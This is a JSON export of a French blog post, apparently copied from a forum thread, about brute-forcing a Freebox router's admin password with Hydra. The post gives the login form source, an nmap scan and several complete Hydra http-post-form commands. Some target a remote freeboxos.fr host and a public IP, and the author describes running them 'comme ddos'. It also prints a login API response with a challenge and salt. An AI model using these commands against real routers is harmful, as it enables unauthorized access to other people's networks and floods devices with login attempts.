{"id":1067,"date":"2021-04-27T08:46:20","date_gmt":"2021-04-27T00:46:20","guid":{"rendered":"https:\/\/byy3.com\/?p=1067"},"modified":"2021-04-27T09:20:26","modified_gmt":"2021-04-27T01:20:26","slug":"hydra-routeur-attack-freebox-kali-linux-fr","status":"publish","type":"post","link":"https:\/\/byy3.com\/?p=1067","title":{"rendered":"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr"},"content":{"rendered":"<p>Salut tout le monde !\u00a0 oui c'est moi apr\u00e9s une longue absence des platform linux\u00a0\u00a0<img decoding=\"async\" class=\"smiley\" data-original=\"http:\/\/www.kali-linux.fr\/forum\/Smileys\/default\/tongue.gif\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe\" \/>\u00a0je suis de retour ^^<\/p>\n<p>En ce moment je me suis orient\u00e9 vers hydra pour essay\u00e9 de trouver le mot de passe d'acces au routeur ( et non pas au r\u00e9seaux, j'y suis d\u00e9ja )<br \/>\ntout d'abord il y a l'adresse du routeur sur le r\u00e9seau : 192.168.1.254<\/p>\n<p>le code source de la page du login qui nous int\u00e9raisse c'est\u00a0 :<\/p>\n<p>&lt;form id=\"login-form\" method=\"POST\" action=\"\/\"&gt;<br \/>\n&lt;input type=\"text\" style=\"display: none;\" value=\"freebox\" name=\"login\"&gt;&lt;\/input&gt;<br \/>\n&lt;input id=\"fbx-password\" class=\"password\" type=\"password\" name=\"password\" value=\"\"&gt;&lt;\/input&gt;<br \/>\n&lt;\/div&gt;<br \/>\n&lt;\/form&gt;<\/p>\n<p>r\u00e9sultat des courses : on a pas besoins de login donc : -l \"\"<br \/>\nla m\u00e9thode = post : http_post_form<\/p>\n<p>au final j'ai le code suivant :<br \/>\nhydra -l \"\" -P \/usr\/share\/wordlists\/nmap2.lst -t 1 -f -v -V 192.168.1.254 http-post-form \/:password=^PASS^:index.php<br \/>\n<strong>donc\u00a0 \u00a0nouvelle version online et correct<\/strong><\/p>\n<p>dabord il faut nmap -p- 91.168.99.0\/32 -Pn<\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \/:password=^PASS^:login.php:\"Identifiants incorrects\"<\/strong><\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \"\/:password=^PASS^:login.php:Identifiants incorrects\"\u00a0 \u00a0 (test good no result)<\/strong><\/p>\n<p><strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 -O http-post-form \"\/:login.php:password=^PASS^:Identifiants incorrects\"\u00a0 \u00a0 \u00a0 \uff08-s\u8868\u793a\u7aef\u53e3 \uff1b-O\u8868\u793a\u52a0\u5bc6\uff09--ddos<\/strong><\/p>\n<p>apres\u00a0 comme ddos <strong>hydra -l \"\" -P \/usr\/share\/wordlists\/nmap.lst -t 12 -v -V xxxx.freeboxos.fr -s 44261 http-post-form \/:password=^PASS^:login.php\u00a0 \u00a0 (5m\/s send aux freebox)<\/strong><\/p>\n<p>Le probl\u00e9me c'est que d\u00e9s que je lance hydra, le premier pass qui est dans la liste de mot de passe me retourne \" 1 of 1 target successfully completed, 1 valid password found \" alors que c'est pas le bon\u00a0\u00a0<img decoding=\"async\" class=\"smiley\" data-original=\"http:\/\/www.kali-linux.fr\/forum\/Smileys\/default\/shocked.gif\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe1\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe1\" \/><\/p>\n<p>qu'en pensez vous ? j'ai une petite id\u00e9e que le modem retourne toujours le code 200 et non pas le 403 pour erreur ce qui fait que hydra pense avoir trouv\u00e9 le bon mot de passe.<\/p>\n<p>Merci.<\/p>\n<p>http:\/\/91.xxx.99.xxx:33839\/api\/v8\/login<\/p>\n<pre>{\"success\":true,\"result\":{\"logged_in\":false,\"challenge\":\"lWuTRdbsj2kmy3d45WAiXYRlWM6tsmIh\",\"password_salt\":\"Gyovy+WiZH3jm7miT\\\/N1tuxoWzKlSTA2\",\"password_set\":true}}<\/pre>\n<p><img decoding=\"async\" data-original=\"https:\/\/www.free.fr\/data\/shared-rs\/freebox-revolution.jpg\" src=\"https:\/\/byy3.com\/wp-content\/themes\/MNews%20V2.4\/images\/post-loading.gif\" title=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe2\" alt=\"Hydra routeur attack &#8221; freebox &#8221; &#8211; Kali-linux.fr\u63d2\u56fe2\" \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Salut tout le monde !\u00a0 oui c&#8217;est moi apr\u00e9s une longue a [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[626,628,627,247,629],"class_list":["post-1067","post","type-post","status-publish","format-standard","hentry","category-net-security","tag-attack","tag-brute","tag-freebox","tag-hydra","tag-password"],"_links":{"self":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1067","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1067"}],"version-history":[{"count":0,"href":"https:\/\/byy3.com\/index.php?rest_route=\/wp\/v2\/posts\/1067\/revisions"}],"wp:attachment":[{"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1067"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1067"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/byy3.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1067"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}